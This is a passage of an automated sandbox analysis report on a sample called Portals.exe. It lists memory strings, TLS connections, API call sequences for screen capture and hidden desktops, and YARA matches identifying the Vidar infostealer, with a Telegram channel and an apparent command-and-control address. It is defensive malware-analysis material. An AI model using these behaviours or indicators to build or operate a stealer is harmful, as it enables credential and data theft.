        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
        Source: chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20161
        Source: chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
        Source: chrome.exe, 0000000D.00000002.1931134895.0000322C015A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e175
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oy
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oy3
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oy3/
        Source: Portals.exe, 00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/l793oyir7amMozilla/5.0
        Source: chrome.exe, 0000000D.00000002.1923169099.0000322C00DEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001315000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.00000000013A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
        Source: Portals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922960977.0000322C00D80000.00000004.00001000.00020000.00000000.sdmp, iekxl6.1.drString found in binary or memory: https://www.ecosia.org/newtab/v20
        Source: Portals.exe, 00000001.00000002.2199005147.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, ct26fk.1.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
        Source: chrome.exe, 0000000D.00000002.1918441719.0000322C00144000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: chrome.exe, 0000000D.00000003.1872766329.0000322C01604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: chrome.exe, 0000000D.00000002.1931377313.0000322C0172C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
        Source: chrome.exe, 0000000D.00000002.1927645714.0000322C01248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
        Source: chrome.exe, 0000000D.00000002.1921596827.0000322C0093C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/#safe
        Source: chrome.exe, 0000000D.00000002.1921653281.0000322C00978000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-features/
        Source: chrome.exe, 0000000D.00000002.1921653281.0000322C00978000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/browser-tools/
        Source: chrome.exe, 0000000D.00000002.1932096401.0000322C0195C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
        Source: chrome.exe, 0000000D.00000002.1906554825.00000262C1600000.00000002.00000001.00040000.00000016.sdmpString found in binary or memory: https://www.google.com/chrome/privacy/eula_text.htmlH&elpManaged
        Source: chrome.exe, 0000000D.00000002.1922902219.0000322C00D44000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922329784.0000322C00B3C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1921347824.0000322C008D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
        Source: Portals.exe, 00000001.00000002.2199617855.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1919261632.0000322C0038C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1921038871.0000322C00834000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920543191.0000322C006A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1929465013.0000322C013A0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1922304042.0000322C00B30000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920509047.0000322C00690000.00000004.00001000.00020000.00000000.sdmp, iekxl6.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: chrome.exe, 0000000D.00000002.1919562511.0000322C0046C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1930277126.0000322C01494000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
        Source: Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: chrome.exe, 0000000D.00000002.1932925486.0000322C01C14000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
        Source: chrome.exe, 0000000D.00000002.1920186646.0000322C005E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
        Source: chrome.exe, 0000000D.00000002.1920186646.0000322C005E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit7E
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
        Source: chrome.exe, 0000000D.00000003.1821282509.00003228004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1933012783.0000322C01CFC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821147924.0000322800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821179447.00003228004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821233579.00003228004B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
        Source: chrome.exe, 0000000D.00000002.1932819325.0000322C01B7C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1820824379.0000322800184000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1917774251.0000322800604000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
        Source: chrome.exe, 0000000D.00000003.1821282509.00003228004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821147924.0000322800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821179447.00003228004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821233579.00003228004B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerForcedOn_PlusAddressAndroidOpenGmsCoreManagementP
        Source: chrome.exe, 0000000D.00000003.1821282509.00003228004C8000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821147924.0000322800498000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821179447.00003228004AC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821085451.000032280048C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000003.1821233579.00003228004B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.managerPlusAddressOfferCreationIfPasswordFieldIsNotVisib
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
        Source: chrome.exe, 0000000D.00000002.1918902930.0000322C00210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
        Source: chrome.exe, 0000000D.00000002.1920833658.0000322C007D4000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932027280.0000322C01940000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
        Source: chrome.exe, 0000000D.00000002.1931082495.0000322C01599000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
        Source: chrome.exe, 0000000D.00000002.1932307577.0000322C01A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000003.1873549004.0000322C0166C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932376341.0000322C01A38000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932508840.0000322C01AAC000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932453580.0000322C01A74000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932482167.0000322C01A8C000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1932307577.0000322C01A04000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.eebVy_fNKiM.2019.O/rt=j/m=q_dnp
        Source: chrome.exe, 0000000D.00000002.1932354357.0000322C01A2C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.sDa5bc0wD58.L.W.O/m=qmd
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: Portals.exe, 00000001.00000002.2202666222.00000000047C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: Portals.exe, 00000001.00000002.2197855678.000000000134A000.00000004.00000020.00020000.00000000.sdmp, 76561199829660832[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Portals.exe, 00000001.00000002.2197855678.0000000001395000.00000004.00000020.00020000.00000000.sdmp, Portals.exe, 00000001.00000002.2197855678.000000000139F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
        Source: chrome.exe, 0000000D.00000002.1922074575.0000322C00A6D000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 0000000D.00000002.1920575603.0000322C006B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49720 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.4:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49782 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49783 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49788 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49791 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 94.130.189.58:443 -> 192.168.2.4:49792 version: TLS 1.2
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00410A90 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,malloc,StrCmpCW,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_00410A90
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00406480 memcpy,OpenDesktopA,CreateDesktopA,lstrcpyA,CreateProcessA,Sleep,CloseDesktop,1_2_00406480

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 1.2.Portals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
        Source: 1.2.Portals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
        Source: 0.2.Portals.exe.3659550.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
        Source: 00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Finds Vidar samples based on the specific strings Author: Sekoia.io
        Source: C:\Users\user\Desktop\Portals.exeCode function: 0_2_007825380_2_00782538
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_00404A201_2_00404A20
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004186301_2_00418630
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0041B7701_2_0041B770
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0041B3001_2_0041B300
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0041C1001_2_0041C100
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_004193D01_2_004193D0
        Source: C:\Users\user\Desktop\Portals.exeCode function: 1_2_0041A7D01_2_0041A7D0
        Source: C:\Users\user\Desktop\Portals.exeCode function: String function: 00410D00 appears 42 times
        Source: C:\Users\user\Desktop\Portals.exeCode function: String function: 0040F5B0 appears 135 times
        Source: C:\Users\user\Desktop\Portals.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 784
        Source: Portals.exe, 00000000.00000002.1556338719.000000000079E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Portals.exe
        Source: 1.2.Portals.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
        Source: 1.2.Portals.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
        Source: 0.2.Portals.exe.3659550.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
        Source: 00000001.00000002.2197435961.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: infostealer_win_vidar_strings_nov23 author = Sekoia.io, description = Finds Vidar samples based on the specific strings, creation_date = 2023-11-10, classification = TLP:CLEAR, version = 1.0, reference = https://twitter.com/crep1x/status/1722652451319202242, id = b2c17627-f9b8-4401-b657-1cce560edc76
        Source: Portals.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
